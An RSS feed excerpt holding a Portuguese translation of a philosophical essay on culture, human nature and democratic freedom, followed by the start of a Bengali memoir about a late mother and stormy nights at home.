<p>Não tem sido comum incluir as artes, especialmente as belas artes, como parte importante das condições sociais que influenciam as instituições democráticas e a liberdade individual. Mesmo após admitir a influência do setor industrial e das ciências naturais, ainda tendemos a traçar uma linha divisória na ideia de que a literatura, a música, a pintura, o teatro e a arquitetura tenham qualquer ligação íntima com as bases culturais da democracia. Mesmo aqueles que se autodenominam bons democratas muitas vezes se contentam em considerar os frutos dessas artes como adornos da cultura, em vez de algo cujo desfrute todos deveriam poder desfrutar, se a democracia quiser ser uma realidade. A situação nos países totalitários pode nos levar a rever essa opinião. Pois demonstra que, independentemente dos impulsos e forças que levam o artista a criar sua obra, as obras de arte, uma vez criadas, são o meio de comunicação mais poderoso para despertar emoções e formar opiniões. O teatro, o cinema e a casa de espetáculos, até mesmo a galeria de arte, a eloquência, os desfiles populares, os esportes comuns e as instituições de lazer, tudo foi submetido à regulamentação como parte dos mecanismos de propaganda que mantêm a ditadura no poder sem que as massas a considerem opressiva. Estamos começando a perceber que as emoções e a imaginação são mais poderosas na formação do sentimento e da opinião pública do que a informação e a razão.</p>

<p>De fato, muito antes da crise atual surgir, já existia um ditado que dizia que, se alguém controlasse as canções de uma nação, não precisaria se preocupar com quem fazia suas leis. E o estudo da história mostra que as religiões primitivas devem seu poder de determinar crenças e ações à sua capacidade de alcançar emoções e imaginação por meio de ritos e cerimônias, lendas e folclore, tudo revestido das características que marcam as obras de arte. A Igreja, que teve de longe a maior influência no mundo moderno, apropriou-se desses mecanismos de apelo estético e os incorporou à sua própria estrutura, adaptando-os ao seu propósito de conquistar e manter a lealdade das massas.</p>

<p>Um regime totalitário se compromete com o controle total da vida de todos os seus súditos, exercendo domínio sobre sentimentos, desejos, emoções e opiniões. Isso, de fato, é uma mera obviedade, visto que um Estado totalitário precisa ser total. Mas, a menos que levemos isso em consideração, não conseguiremos apreciar a intensidade do ressurgimento da guerra entre Estado e Igreja que existe na Alemanha e na Rússia. O conflito não é expressão do capricho de um líder. É inerente a qualquer regime que exija a lealdade total de todos os seus súditos. Ele deve, antes de tudo, e sobretudo, para ser permanente, cativar a imaginação, com todos os impulsos e motivações que costumamos chamar de internos. As organizações religiosas são aquelas que governam por meio desses mecanismos e, por essa razão, são concorrentes intrínsecas de qualquer Estado político que trilhe o caminho totalitário. Assim, as mesmas coisas que nos parecem, nos países democráticos, os aspectos mais repugnantes do Estado totalitário são justamente as que seus defensores o recomendam. São as coisas cuja ausência eles denunciam nos países democráticos. Pois dizem que a incapacidade de envolver toda a composição dos cidadãos, tanto emocional quanto ideológica, condena os estados democráticos a empregar meramente artifícios externos e mecânicos para manter o apoio leal de seus cidadãos. Podemos considerar tudo isso como sintoma de uma alucinação coletiva, que por vezes parece ter dominado populações inteiras. Mesmo assim, devemos reconhecer a influência desse fator se quisermos escapar da ilusão coletiva de que o totalitarismo se baseia unicamente na coerção externa.</p>

<p>Finalmente, o fator moral é parte intrínseca do complexo de forças sociais chamado cultura. Pois, independentemente de se compartilhar ou não da visão, atualmente defendida por diferentes grupos com base em diferentes argumentos, de que não há fundamento ou justificativa científica para convicções e julgamentos morais, é certo que os seres humanos prezam algumas coisas mais do que outras e que lutam por aquilo que valorizam, dedicando tempo e energia a isso: fazendo-o, aliás, a tal ponto que a melhor medida que temos do que é valorizado é o esforço despendido em sua defesa. Não só isso, mas para que um grupo de pessoas forme algo que possa ser chamado de comunidade em seu sentido pleno, é necessário que haja valores prezados em comum. Sem eles, qualquer suposto grupo social, classe, povo ou nação tende a se desintegrar em moléculas com conexões meramente impostas entre si. Pelo menos por ora, não precisamos questionar se os valores são morais, possuindo uma espécie de vida e potência próprias, ou se são apenas subprodutos do funcionamento de outras condições, biológicas, econômicas ou quaisquer outras.</p>

<p>A ressalva parecerá, de fato, bastante supérflua para a maioria, tão habituadas estão as pessoas a acreditar, pelo menos nominalmente, que as forças morais são os determinantes últimos da ascensão e queda de todas as sociedades humanas — enquanto a religião ensinou muitos a crer que as forças cósmicas, assim como as sociais, são reguladas em prol de fins morais. A ressalva se faz necessária, contudo, devido à existência de uma corrente filosófica que defende que as opiniões sobre os valores que regem a conduta carecem de qualquer fundamento científico, uma vez que (segundo eles) as únicas coisas que podem ser conhecidas são os eventos físicos. A negação de que os valores tenham qualquer influência no curso dos acontecimentos a longo prazo também é característica da crença marxista de que as forças produtivas controlam, em última instância, todas as relações humanas. A ideia da impossibilidade da regulação intelectual de ideias e juízos sobre valores é compartilhada por diversos intelectuais que se deixaram deslumbrar pelo sucesso das ciências matemáticas e físicas. Essas últimas observações sugerem que há pelo menos um outro fator na cultura que merece atenção: a existência de correntes de filosofia social, de ideologias concorrentes.</p>

<p>A intenção da discussão anterior deve ser óbvia. O problema da liberdade e das instituições democráticas está ligado à questão de que tipo de cultura existe; à necessidade de uma cultura livre para que existam instituições políticas livres. A importância dessa conclusão vai muito além do seu contraste com a crença mais simples daqueles que formularam a tradição democrática. A questão da psicologia humana, da constituição da natureza humana em seu estado original, está envolvida. Está envolvida não apenas de forma geral, mas também em relação aos seus componentes específicos e à sua importância nas relações entre si. Pois toda filosofia social e política atualmente professada, após exame, revelará que envolve uma certa visão sobre a constituição da natureza humana: em si mesma e em sua relação com a natureza física. O que é verdade sobre esse fator é verdade sobre todos os fatores da cultura, de modo que não precisam ser listados novamente aqui, embora seja necessário tê-los todos em mente se quisermos apreciar a variedade de fatores envolvidos no problema da liberdade humana.</p>

<p>A questão da relação entre este ou aquele componente da cultura e as instituições sociais em geral, e a democracia política em particular, raramente é abordada. No entanto, essa questão é tão fundamental para qualquer análise crítica dos princípios de cada uma delas que alguma conclusão sobre o assunto acaba por definir a posição adotada em cada questão específica. A questão é se algum dos fatores é tão predominante a ponto de ser a força causal, de modo que os outros fatores sejam efeitos secundários e derivados. Geralmente, a resposta encontrada segue uma linha que os filósofos denominam monista. O exemplo mais óbvio é a crença de que as condições econômicas são, em última análise, as forças controladoras das relações humanas. Talvez seja significativo que essa visão seja relativamente recente. No auge do século XVIII, o Iluminismo, a visão predominante, conferia supremacia final à razão, ao avanço da ciência e à educação. Mesmo durante o século passado, prevalecia uma visão expressa no lema de uma certa escola de historiadores: “A história é a política do passado e a política é a história do presente”.</p>

<p>Devido à atual tendência das explicações econômicas, essa visão política pode agora parecer ter sido uma mania de um grupo específico de historiadores. Mas, afinal, ela apenas formulou uma ideia que foi consistentemente posta em prática durante o período de formação dos Estados nacionais. É possível considerar a ênfase atual nos fatores econômicos como uma espécie de vingança intelectual pela negligência quase total que sofreu no passado. A própria expressão “economia política” sugere o quão completamente as considerações econômicas foram outrora subordinadas às políticas. O livro que foi influente para pôr fim a essa submissão, A Riqueza das Nações, de Adam Smith, deu continuidade, em seu título, embora não em seu conteúdo, à tradição mais antiga. No período grego, vemos que Aristóteles confere ao fator político um poder tão grande que todas as atividades econômicas normais são relegadas ao âmbito doméstico, de modo que toda prática econômica moralmente justificável é, literalmente, economia doméstica. E apesar da recente popularidade da teoria marxista, Oppenheimer produziu um conjunto considerável de evidências em apoio à tese de que os estados políticos são o resultado de conquistas militares nas quais os povos derrotados se tornaram súditos de seus conquistadores, que, ao assumirem o domínio sobre os conquistados, deram origem aos primeiros estados políticos.</p>

<p>A ascensão dos estados totalitários não pode, pelo simples fato de serem totalitários, ser considerada uma mera regressão à antiga teoria da supremacia do fator institucional político. Contudo, em comparação com as teorias que subordinaram o político ao econômico, seja na forma marxista ou na da escola clássica britânica, ela representa uma regressão a ideias e, ainda mais, a práticas que se supunha terem desaparecido para sempre da conduta de qualquer estado moderno. E essas práticas foram revividas e ampliadas com o benefício da técnica científica de controle da indústria, das finanças e do comércio, de maneiras que demonstram que os antigos funcionários governamentais que adotaram a economia “mercantilista” em nome do governo eram os maiores incompetentes em seu trabalho declarado.</p>

<p>A ideia de que a moral deveria ser, mesmo que não o seja, a suprema reguladora dos assuntos sociais não é tão difundida como já foi, e há circunstâncias que corroboram a conclusão de que, quando as forças morais eram tão influentes quanto se supunha, era porque a moral era idêntica aos costumes que, de fato, regulavam as relações entre os seres humanos. Contudo, a ideia de que a adoção, por exemplo, da Regra de Ouro, eliminaria rapidamente toda a discórdia e os problemas sociais ainda é propagada por sermões e editoriais da imprensa; e, enquanto escrevo, os jornais noticiam o progresso de uma campanha por algo chamado “rearmamento moral”. Em um nível mais profundo, a questão levantada sobre a suposta identidade da ética com os costumes estabelecidos suscita a pergunta de se o efeito da desintegração dos costumes que, por muito tempo, mantiveram os homens unidos em grupos sociais pode ser superado senão pelo desenvolvimento de novas tradições e costumes geralmente aceitos. Esse desenvolvimento, sob essa perspectiva, seria equivalente à criação de uma nova ética.</p>

<p>Contudo, tais questões são aqui levantadas devido à ênfase que conferem à questão já apresentada: existe algum fator ou fase da cultura que seja dominante, ou que tenda a produzir e regular outros, ou a economia, a moral, a arte, a ciência, e assim por diante, são apenas aspectos da interação de diversos fatores, cada um dos quais age sobre os outros e é afetado por eles? Na linguagem profissional da filosofia: nosso ponto de vista deve ser monista ou pluralista? A mesma questão se repete, além disso, em relação a cada um dos fatores listados: — sobre a economia, sobre a política, sobre a ciência, sobre a arte. Ilustrarei aqui o ponto não com base em nenhuma dessas coisas, mas em teorias que, em diferentes momentos, influenciaram a compreensão da natureza humana. Pois essas teorias psicológicas foram marcadas por sérias tentativas de fazer de algum componente da natureza humana a fonte da motivação da ação; ou, pelo menos, de reduzir toda a conduta à ação de um pequeno número de supostas “forças” inatas. Um exemplo relativamente recente foi a adoção, pela escola clássica da teoria econômica, do autointeresse como a principal força motivadora do comportamento humano; Uma ideia ligada, em seu aspecto técnico, à noção de que o prazer e a dor são as causas e os fins de toda conduta humana consciente, no desejo de obter um e evitar o outro. Havia também a visão de que o interesse próprio e a compaixão são os dois componentes da natureza humana, enquanto tendências centrífugas e centrípetas opostas e equilibradas são as forças motrizes da natureza celeste.</p>

<p>Atualmente, o candidato ideológico e psicológico preferido para o controle da atividade humana é o amor pelo poder. As razões para essa escolha não são difíceis de encontrar. O sucesso na busca pelo lucro econômico mostrou-se, em grande parte, condicionado à posse de poder superior, enquanto o sucesso reagiu ao aumento do poder. Além disso, a ascensão dos Estados nacionais foi acompanhada por uma organização tão vasta e flagrante das forças militares e navais que a política se tornou cada vez mais marcadamente política de poder, levando à conclusão de que não existe outra forma de política, embora no passado o elemento poder tenha sido mais discretamente disfarçado. Uma interpretação da luta darwiniana pela existência e sobrevivência do mais apto foi usada como suporte ideológico; e alguns autores, notadamente Nietzsche (embora não na forma grosseira frequentemente alegada), propuseram uma ética do poder em oposição à suposta ética cristã do sacrifício.</p>

<p>Como a natureza humana é o fator que, de uma forma ou de outra, interage constantemente com as condições ambientais na produção cultural, o tema recebe atenção especial mais adiante. Mas a mudança que ocorreu ocasionalmente nas teorias que ganharam força sobre o “motivo dominante” na natureza humana sugere uma questão raramente levantada: será que essas psicologias não inverteram a ordem dos fatores? Não teriam elas construído sua noção sobre o elemento dominante na natureza humana a partir da observação de tendências marcantes na vida coletiva contemporânea, agrupando-as em alguma suposta “força” psicológica como sua causa? É significativo que a natureza humana tenha sido considerada fortemente movida por um amor inato à liberdade na época em que havia uma luta por um governo representativo; que o motivo do interesse próprio tenha surgido quando as condições na Inglaterra ampliaram o papel do dinheiro, devido aos novos métodos de produção industrial; que o crescimento das atividades filantrópicas organizadas tenha introduzido a compaixão no quadro psicológico; e que os eventos atuais sejam facilmente convertidos em amor ao poder como a principal força motriz da ação humana.</p>

<p>Em todo caso, a ideia de cultura que se tornou familiar através do trabalho de estudiosos da antropologia aponta para a conclusão de que, quaisquer que sejam os constituintes nativos da natureza humana, a cultura de um período e grupo é a influência determinante em sua organização; é ela que determina os padrões de comportamento que caracterizam as atividades de qualquer grupo, família, clã, povo, seita, facção ou classe. É tão verdadeiro que o estado da cultura determina a ordem e a organização das tendências nativas quanto que a natureza humana produz qualquer conjunto ou sistema particular de fenômenos sociais para obter satisfação pessoal. O problema é descobrir como os elementos de uma cultura interagem entre si e como os elementos da natureza humana são levados a interagir entre si sob as condições estabelecidas por sua interação com o ambiente existente. Por exemplo, se nossa cultura americana é em grande parte uma cultura pecuniária, não é porque a estrutura original ou inata da natureza humana tenda por si mesma a obter lucro pecuniário. É antes que uma determinada cultura complexa estimule, promova e consolida tendências nativas de modo a produzir um certo padrão de desejos e propósitos. Se considerarmos todas as comunidades, povos, classes, tribos e nações que já existiram, podemos ter certeza de que, como a natureza humana em sua constituição inata é a constante relativa, não se pode recorrer a ela, isoladamente, para explicar a multiplicidade de diversidades apresentadas pelas diferentes formas de associação.</p>

<p>Povos primitivos, por razões agora bastante evidentes, atribuem qualidades mágicas ao sangue. Crenças populares sobre raça e diferenças raciais inerentes praticamente perpetuaram as superstições mais antigas. Os antropólogos concordam quase unanimemente que as diferenças que encontramos em diferentes “raças” não se devem a nada na estrutura fisiológica inerente, mas aos efeitos exercidos sobre os membros de vários grupos pelas condições culturais em que são criados; condições que atuam sobre a natureza humana bruta ou original incessantemente desde o momento do nascimento. Sempre se soube que bebês, nascidos sem domínio de qualquer idioma, passam a falar o idioma, qualquer que seja, da comunidade em que nasceram. Como a maioria dos fenômenos uniformes, esse fato não despertou curiosidade nem levou a generalizações sobre a influência das condições culturais. Era dado como certo; era tão “natural” que parecia inevitável. Somente com o surgimento de pesquisas sistemáticas realizadas por estudantes de antropologia é que se notou que as condições culturais que produzem o idioma comum de um determinado grupo geram outras características que eles têm em comum. — características que, assim como a língua materna, diferenciam um grupo ou sociedade de outros.
A cultura, enquanto corpo complexo de costumes, tende a se manter. Ela só pode se reproduzir através da promoção de certas mudanças diferenciais nas constituições originais ou nativas de seus membros.</p>

<p>Cada cultura possui seu próprio padrão, sua própria organização característica de suas energias constituintes. Pela mera força de sua existência, bem como por métodos deliberadamente adotados e sistematicamente aplicados, ela se perpetua através da transformação da natureza humana bruta ou original daqueles que nascem imaturos.</p>

<p>Essas afirmações não significam que a hereditariedade biológica e as diferenças individuais nativas não tenham importância. Significam que, ao operarem dentro de uma determinada forma social, são moldadas e produzem efeitos dentro dessa forma específica. Não são características indígenas que distinguem um povo, um grupo, uma classe de outro, mas sim características que marcam diferenças em todos os grupos. Seja qual for o “fardo do homem branco”, ele não foi imposto pela hereditariedade.</p>

<p>Percorremos um longo caminho desde as perguntas iniciais, a ponto de parecer que elas foram esquecidas ao longo da jornada. Mas a jornada foi empreendida com o objetivo de descobrir algo sobre a natureza do problema expresso nas perguntas formuladas. A manutenção das instituições democráticas não é uma questão tão simples quanto alguns dos Pais Fundadores supunham — embora os mais sábios entre eles percebessem o quanto o novo experimento político era favorecido por circunstâncias externas — como o oceano que separava os colonos dos governos que tinham interesse em usá-los para seus próprios fins; o fato de as instituições feudais terem sido deixadas para trás; que muitos colonos vieram para cá para escapar das restrições às crenças religiosas e às formas de culto; e, especialmente, a existência de um vasto território com terras livres e imensos recursos naturais ainda não apropriados.</p>

<p>A função da cultura em determinar quais elementos da natureza humana são dominantes e seu padrão ou arranjo em relação uns aos outros vai além de qualquer ponto específico a que se desvie a atenção. Ela afeta a própria ideia de individualidade. A ideia de que a natureza humana é inerentemente e exclusivamente individual é, em si, um produto de um movimento cultural individualista. A ideia de que a mente e a consciência são intrinsecamente individuais sequer ocorreu a alguém durante grande parte da história da humanidade. Teria sido rejeitada como a fonte inevitável de desordem e caos se alguém tivesse sequer cogitado sugeri-la — não que suas ideias sobre a natureza humana, por esse motivo, fossem melhores do que as posteriores, mas sim que também eram funções da cultura. Tudo o que podemos afirmar com segurança é que a natureza humana, como outras formas de vida, tende à diferenciação, e esta se move na direção do distintamente individual, e que também tende à combinação, à associação. Nos animais inferiores, fatores físico-biológicos determinam qual tendência é dominante em uma dada espécie animal ou vegetal e a proporção existente entre os dois fatores — se, por exemplo, os insetos são o que os estudantes chamam de “solitários” ou “sociais”. Nos seres humanos, as condições culturais substituem as estritamente físicas. Nos períodos iniciais da história humana, elas atuavam quase como condições fisiológicas no que diz respeito à intenção deliberada. Eram consideradas “naturais” e qualquer alteração nelas, antinatural. Em um período posterior, as condições culturais passaram a ser vistas como sujeitas, em certa medida, à formação deliberada. Por um tempo, os radicais identificaram suas políticas com a crença de que, se as condições sociais artificiais fossem eliminadas, a natureza humana produziria quase automaticamente um certo tipo de arranjo social, aquele que lhe daria livre curso em seu suposto caráter exclusivamente individual.</p>

<p>Tendências à sociabilidade, como a simpatia, eram admitidas. Mas eram consideradas traços de um indivíduo isolado por natureza, tanto quanto, digamos, uma tendência a se associar a outros para obter proteção contra algo que ameace o próprio eu privado. Se a completa identificação da natureza humana com a individualidade seria desejável ou indesejável, caso existisse, é uma questão acadêmica ociosa. Pois ela não existe. Algumas condições culturais desenvolvem os componentes psicológicos que levam à diferenciação; outras estimulam aqueles que levam à solidariedade da colmeia ou do formigueiro. O problema humano é o de assegurar o desenvolvimento de cada componente para que ele sirva para liberar e amadurecer o outro. A cooperação — chamada de fraternidade na fórmula clássica francesa — é tão parte do ideal democrático quanto a iniciativa pessoal. O fato de terem sido permitidas condições culturais (notavelmente na fase econômica) que subordinaram a cooperação à liberdade e à igualdade explica o declínio destas duas últimas. Indiretamente, esse declínio é responsável pela atual tendência de denegrir a própria palavra individualismo e de transformar a sociabilidade em um termo de honra moral acima de qualquer crítica. Mas a ideia de que a associação de nulidades, mesmo em larga escala, constituiria uma realização da natureza humana é tão absurda quanto supor que esta possa ocorrer em seres cujas únicas relações entre si sejam aquelas estabelecidas em prol de vantagens privadas exclusivas.</p>

<p>O problema da liberdade das individualidades cooperativas deve, portanto, ser analisado no contexto da cultura. O estado da cultura é um estado de interação de muitos fatores, entre os quais se destacam o direito e a política, a indústria e o comércio, a ciência e a tecnologia, as artes da expressão e da comunicação, e a moral, ou seja, os valores que os homens prezam e as maneiras pelas quais os avaliam; e, finalmente, embora indiretamente, o sistema de ideias gerais utilizado pelos homens para justificar e criticar as condições fundamentais em que vivem, sua filosofia social. Estamos preocupados com o problema da liberdade, e não com soluções: na convicção de que as soluções são inúteis enquanto o problema não for colocado no contexto dos elementos que constituem a cultura, em sua interação com elementos da natureza humana inata. O postulado fundamental da discussão é que o isolamento de qualquer fator, por mais forte que seja sua atuação em um dado momento, é fatal para a compreensão e para a ação inteligente. Isolamentos têm sido abundantes, tanto por considerarem algum aspecto da natureza humana como um “motivo” supremo, quanto por considerarem alguma forma de atividade social como suprema. Uma vez que o problema aqui é entendido como a forma como um grande número de fatores internos e externos à natureza humana interagem, nossa próxima tarefa é questionar as conexões recíprocas que a natureza humana em seu estado bruto e a cultura mantêm entre si.</p>
]]></content:encoded>
      <author>Nomos</author>
      <guid>https://infosec.press/read/a/ik6od9xto3</guid>
      <pubDate>Thu, 28 May 2026 03:46:58 +0000</pubDate>
    </item>
    <item>
      <title>শূন্য সোফার রুম এবং হারানো এক আলোকবর্তিকা</title>
      <link>https://infosec.press/lokmanus/shuuny-sophaar-rum-ebn-haaraano-ek-aalokbrtikaa</link>
      <description>&lt;![CDATA[&#xA;&#xA;জানালার কাচে তখনো বৃষ্টির শেষ ফোঁটাগুলো আলতো করে টোকা দিয়ে যাচ্ছে। কিছুক্ষণ আগেও প্রকৃতির বুকে যে উন্মাতাল তাণ্ডব চলল, তাকে একরকম রূপকথা বলেই ভ্রম হয়। দমকা ঝড়ো বাতাস, মেঘের গুরুগুরু গগনবিদারী গর্জন, আর সাথে বুক কাঁপানো দুই-একটি বজ্রপাত -সব মিলিয়ে প্রকৃতি যেন তার সমস্ত ক্ষোভ উগরে দিল এই আধঘণ্টায়।&#xA;&#xA;তারপর হঠাৎ করেই শান্ত। আকাশ তার রাগ ঝেড়ে এখন হালকা, শান্ত। ঘরের কোণে জমে উঠেছে একটা শিরশিরে ঠান্ডা হাওয়া, যা গায়ে লাগলেই কেমন যেন একটা আলসেমি জড়িয়ে ধরে। মন বলে, এই চমৎকার ঠান্ডা আবহে কম্বলটা গায়ে টেনে দিয়ে একটা লম্বা, নিটোল ঘুম দেওয়া যাক। কিন্তু চোখ বুজলেই কি আর ঘুম আসে? কিছু কিছু আবহাওয়া আসলে ঘুমের চেয়ে বেশি জাগিয়ে তোলে ভেতরের মানুষকে, খুঁচিয়ে খুঁচিয়ে স্মৃতির ধুলোবালি ঝেড়ে ফেলে তাকে তুলে ধরে মনের দৃষ্টিতে।&#xA;&#xA;যেমন আজ এই বৃষ্টির শেষলগ্নে এসে বুকটা কেমন যেন হুঁ হুঁ করে উঠল। খুব মনে পড়ছে আম্মাকে।&#xA;&#xA;!--more--&#xA;&#xA;আসলে ‘ইদানীং মনে পড়ছে’ বলাটা ভুল হবে। আম্মা চলে যাওয়ার পর থেকে জীবনের এমন কোনো মুহূর্ত নেই, যেখানে তার ছায়া আমি খুঁজে না। এখন প্রতিটা ছোটোখাটো কাজেই আম্মা অবধারিতভাবে চলে আসেন। কোনো একটা কাজ করতে গিয়ে থমকে দাঁড়িয়ে ভাবি, ‘আচ্ছা, আম্মা থাকলে তো কাজটা এভাবে করতেন না, তিনি হয়তো অন্য কোনো সহজ উপায়ে করে দিতেন!’ কিংবা কোনো জিনিস অগোছালো দেখলে কানের কাছে যেন মায়ের সেই চিরচেনা কণ্ঠস্বর ভেসে ওঠে, ‘এটা এখানে রাখছিস কেন? ঐখানে রাখ।’ অথবা কোনো কাজে আটকে গেলে মনে হয়, আম্মা থাকলে ঠিকই এই সমস্যার কোনো সমাধান বলে দিতেন। এই রকম হাজারো হাবিজাবি, টুকরো টুকরো ভাবনা এখন আমার একাকিত্বের সঙ্গী।&#xA;&#xA;তবে আজকের এই ঝড়-বৃষ্টির রাতটা যেন আম্মার স্মৃতিকে বড্ড বেশি জীবন্ত করে তুলেছে। আম্মাকে আমাদের চেনা-পরিচিত সবাই খুব সাহসী এক নারী হিসেবেই জানত। যে কোনো বড়ো বিপদ বা কঠিন পরিস্থিতি তিনি এত ঠান্ডা মাথায় সামাল দিতেন যে, অবাক হতে হতো। দেখে মনে হতো, তার কোনো উদ্বেগ নেই, কোনো তাড়াহুড়ো নেই। যেন এক অদ্ভুত জাদুবলে সবটা ঠিক হয়ে যাচ্ছে, কিংবা অদৃশ্য কেউ একজন এসে তার হয়ে সব গুছিয়ে দিয়ে যাচ্ছে।&#xA;&#xA;কিন্তু আমার কেন যেন মনে হতো, এই পাহাড়সম সাহসী মানুষটারও একটা দুর্বল জায়গা ছিল। ঝড়-বৃষ্টির সময় আম্মাকে আমার বড্ড ভীতু মনে হতো। যদিও তিনি মুখে কখনো ভয়ের কথা স্বীকার করতেন না, চোখে-মুখেও ভয়ের কোনো রেখা ফুটতে দিতেন না, তাও একজন সন্তানের চোখ তো! মায়ের ভেতরের চাপা অস্থিরতাটুকু আমি ঠিকই টের পেতাম।&#xA;&#xA;সেই দিনগুলোর কথা মনে হলে আজও ঠোঁটের কোণে মৃদু হাসি ফোটে, আবার পরক্ষণেই চোখটা ভিজে আসে। বজ্রপাত শুরু হওয়া মাত্রই নিয়ম করে এলাকার বিদ্যুৎ চলে যেত। চারদিক ঘুটঘুটে অন্ধকার হওয়ার আগেই আম্মা তড়িঘড়ি করে এসে বসতেন আমাদের ড্রয়িংরুমে, যেটাকে আমরা বলতাম ‘সোফার রুম’। সোফার রুমে বসেই উচ্চকণ্ঠে বাড়ির সবাইকে ডাকতেন, ‘কই রে তোরা, সব এখানে আয়!’&#xA;&#xA;আম্মার ডাক শোনামাত্রই আমরা যে যেখানে থাকতাম সবাই মিলে টর্চ, চার্জার লাইট কিংবা মোবাইলের ফ্ল্যাশ জ্বালিয়ে সেই সোফার রুমে গিয়ে জড়ো হতাম। মুহূর্তের মধ্যেই সেই অন্ধকার ঘরটা আলো আর মানুষের কলকাকলিতে মুখর হয়ে উঠতো। এরপর শুরু হতো এক তুমুল আড্ডা। বাচ্চারা আলো-আধারেই নিজেদের মতো খেলা শুরু করে দিতো, চিৎকার করত, ঝগড়া করতো আবার খুনসুটিতে মেতে উঠত।&#xA;&#xA;আম্মা কখনো কখনো সোফায় কিংবা মেঝেতে বসতেন। বাকিরা যে যার সুবিধা মতো জায়গা করে বসতো। তারপর আম্মা ধীরে ধীরে বলতে শুরু করতেন। কত গল্প বলতেন, কত মানুষকে নিয়ে বলতেন, কত-কত সময়কে নিয়ে বলতেন। কী ছিলো না তার সেই টুকরো টুকরো কথায়! আমি সাধারণত সেসব আড্ডায় খুব একটা কথা বলতাম না, নিজের মতো এক কোণে বসে আম্মার গল্প শুনতাম, বাচ্চাদের আনন্দ দেখতাম, মোবাইল স্ক্রিনে দৃষ্টি নিবন্ধ করে রাখতাম, আর মাঝে মাঝে চোখ তুলে আম্মাকে একটু দেখতাম। অন্ধকারের মাঝেও আম্মার হাসিমুখটা দেখতে বড্ড ভালো লাগত।&#xA;&#xA;আম্মা শুধু আমাদের নিয়েই ব্যস্ত থাকতেন এমন না, বরং ঝড়ের মাঝেই মোবাইলে কাছের-দূরের আত্মীয়, পরিচিত সব মানুষকে ফোন করে খোঁজ-খবর নিতেন। কে কেমন আছে, কার বাড়ির চাল উড়ে গেল কি না, কোথাও কোনো ক্ষয়ক্ষতি হলো কি না -এমন সব খোঁজ-খবর নেয়া চলতো। পুরো ঘরটা তখন এক অদ্ভুত ওমে, ভালোবাসার চাদরে ঢাকা পড়ে থাকত। বাইরের ঝড়-বৃষ্টির হুংকার তখন আর আমাদের ছুঁতে পারত না।&#xA;&#xA;আজ আম্মা নেই, দেখতে দেখতে একটা বছর পার হয়ে গেল। প্রকৃতিতে আজও ঝড় আসে, বৃষ্টি নামে, আকাশ ভেঙে বজ্রপাত হয়। বিদ্যুৎ চলে গেলে চারদিক আগের মতোই অন্ধকার হয়ে যায়। কিন্তু আমাদের আর সেই সোফার রুমে একত্রে বসা হয় না। সত্যি বলতে, এখন আর ওভাবে বসতে ইচ্ছেও করে না। যে মানুষটাকে কেন্দ্র করে আমাদের সেই অন্ধকারের উৎসব জমে উঠত, সেই মানুষটাই যখন নেই, তখন সোফার রুমের ওই শূন্যতাটুকু বড্ড বেশি কামড়ে ধরে। সবার হৃদয়ে আলো জ্বালানোর মানুষটাই আজ অন্ধকার ঘরে একাকী নিদ্রা যাপন করছে।&#xA;&#xA;মাঝে মাঝে এই রকম দমকা হাওয়া আর বৃষ্টির রাতে বুকের ভেতরটা বড্ড বেশি হাহাকার করে ওঠে। তীব্র ইচ্ছে জাগে, সব ফেলে এই ঝড়-বৃষ্টির মাঝেই ছুটে যাই আম্মার কবরের পাশে। সেখানে গিয়ে চুপচাপ বসে থাকি, যেভাবে একসময় সোফার রুমে এক কোণে বসতাম। আম্মার মাটির বিছানার পাশে বসে বলি, ‘আম্মা, ডরাইয়েন না। এই বৃষ্টি একটু পরেই থাইমা যাইবো।’&#xA;&#xA;কিন্তু সময় আর নিষ্ঠুর বাস্তবতার বেড়াজালে আটকে সেই ইচ্ছেটা আর পূরণ হয় না। জানালা দিয়ে আসা ঠান্ডা বাতাসটা গায়ে লাগে, আর আমি একা ঘরের বিছানায় শুয়ে স্মৃতির কম্বল মুড়ি দিয়ে আম্মাকে খুঁজি।&#xA;&#xA;আম্মা ভালো থাকুক তার এই দীর্ঘ নিদ্রায়। পৃথিবীর কোনো ঝড়, কোনো মেঘের গর্জন কিংবা কোনো বজ্রপাত আর কখনোই যেন তাকে বিচলিত না করতে পারে। অনন্তকাল পরম শান্তিতে তিনি ঘুমিয়ে থাকুক নিশ্চিন্তে।&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://images2.imgbox.com/10/bc/7pTE2iWd_o.jpg" alt=""></p>

<p>জানালার কাচে তখনো বৃষ্টির শেষ ফোঁটাগুলো আলতো করে টোকা দিয়ে যাচ্ছে। কিছুক্ষণ আগেও প্রকৃতির বুকে যে উন্মাতাল তাণ্ডব চলল, তাকে একরকম রূপকথা বলেই ভ্রম হয়। দমকা ঝড়ো বাতাস, মেঘের গুরুগুরু গগনবিদারী গর্জন, আর সাথে বুক কাঁপানো দুই-একটি বজ্রপাত -সব মিলিয়ে প্রকৃতি যেন তার সমস্ত ক্ষোভ উগরে দিল এই আধঘণ্টায়।</p>

<p>তারপর হঠাৎ করেই শান্ত। আকাশ তার রাগ ঝেড়ে এখন হালকা, শান্ত। ঘরের কোণে জমে উঠেছে একটা শিরশিরে ঠান্ডা হাওয়া, যা গায়ে লাগলেই কেমন যেন একটা আলসেমি জড়িয়ে ধরে। মন বলে, এই চমৎকার ঠান্ডা আবহে কম্বলটা গায়ে টেনে দিয়ে একটা লম্বা, নিটোল ঘুম দেওয়া যাক। কিন্তু চোখ বুজলেই কি আর ঘুম আসে? কিছু কিছু আবহাওয়া আসলে ঘুমের চেয়ে বেশি জাগিয়ে তোলে ভেতরের মানুষকে, খুঁচিয়ে খুঁচিয়ে স্মৃতির ধুলোবালি ঝেড়ে ফেলে তাকে তুলে ধরে মনের দৃষ্টিতে।</p>

<p>যেমন আজ এই বৃষ্টির শেষলগ্নে এসে বুকটা কেমন যেন হুঁ হুঁ করে উঠল। খুব মনে পড়ছে আম্মাকে।</p>



